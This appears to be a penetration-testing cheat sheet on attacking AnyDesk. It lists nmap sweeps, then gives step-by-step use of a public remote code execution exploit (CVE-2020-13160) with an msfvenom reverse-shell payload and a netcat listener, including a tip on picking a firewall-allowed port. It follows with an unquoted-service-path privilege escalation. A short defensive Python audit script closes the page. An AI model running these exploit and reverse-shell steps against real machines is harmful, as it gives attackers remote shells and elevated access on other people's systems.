AnyDesk – port 7070 (TCP) / 50001 (UDP)

AnyDesk is a proprietary remote desktop application distributed by AnyDesk Software GmbH that provides platform-independent remote access to personal computers and other devices running the host application.

❗ AnyDesk is frequently used by scammers. It offers remote control, file transfer, and VPN functionality.

Nmap sweep for AnyDesk

IP=x.x.x.1-254
sudo nmap -Pn -sT -sC -sV -p 7070 -T5 --open $IP
sudo nmap -Pn -sU -sC -sV -p 50001 -T5 --open $IP

Exploits

searchsploit anydesk

AnyDesk 5.5.2 – Remote Code Execution (CVE-2020-13160)

searchsploit -m 49613

Generate the shellcode

💡 Depending on firewall rules, you might need to use a port that is allowed, such as 7070 (allowed for AnyDesk), instead of 4444 as suggested in the exploit.

msfvenom -p linux/x64/shell_reverse_tcp LHOST=$KALI_IP LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode
  • Edit the IP address in the exploit to the victim host. Leave port 50001 unchanged, as it is the default UDP port for AnyDesk.
  • Replace the shellcode in the exploit with the generated shellcode.

Start a listener

nc -nlvp 4444

Execute the exploit

./49613.py

According to the exploit, you should get a shell within 5 seconds.

Privilege Escalation (Windows)

sc query AnyDesk
sc qc anydesk
C:\Program Files (x86)\AnyDesk\AnyDesk.exe

Not tested, but the only option seems to be:

C:\Program.exe

See Windows Unquoted Service Path. Could require a reboot if the service cannot be restarted.
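
A defender-side check for the unquoted service path condition described above, as an added example that is not part of the original page: it parses `sc qc` output and reports services whose image path is unquoted and contains a space, together with the quoted form to set instead. The sample output, the `--service` argument and the function name `audit_sc_qc` are constructed for illustration.

```python
import re

# Constructed `sc qc` output for three services (illustrative, not from a real host).
SAMPLE_SC_QC = r"""
SERVICE_NAME: AnyDesk
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files (x86)\AnyDesk\AnyDesk.exe --service
SERVICE_NAME: QuotedSvc
        BINARY_PATH_NAME   : "C:\Program Files\Vendor\agent.exe" -k run
SERVICE_NAME: NoSpaceSvc
        BINARY_PATH_NAME   : C:\Windows\System32\svchost.exe -k netsvcs -p
"""

# The executable part ends at the first ".exe" followed by whitespace or end of line.
EXE_RE = re.compile(r"^(.*?\.exe)(\s.*)?$", re.IGNORECASE)


def audit_sc_qc(text):
    """Return one finding per service whose image path is unquoted and contains a space."""
    findings, name = [], None
    for line in text.splitlines():
        # Split at the first colon only, so the drive-letter colon stays in the value.
        key, _, value = line.strip().partition(":")
        key, value = key.strip(), value.strip()
        if key == "SERVICE_NAME":
            name = value
        elif key == "BINARY_PATH_NAME" and name:
            if value.startswith('"'):
                continue  # already quoted, nothing to report
            match = EXE_RE.match(value)
            if not match:
                continue  # not an .exe image (for example a driver), out of scope here
            exe, args = match.group(1), match.group(2) or ""
            if " " in exe:
                findings.append(
                    {"service": name, "image": exe, "fixed": f'"{exe}"{args}'}
                )
    return findings


if __name__ == "__main__":
    for f in audit_sc_qc(SAMPLE_SC_QC):
        print(f"{f['service']}: unquoted image path {f['image']}")
        print(f"  set BINARY_PATH_NAME to: {f['fixed']}")
```

Feed it the saved output of `sc qc` for each service on a host; after correcting a service's path, re-run `sc qc` to confirm the value is quoted.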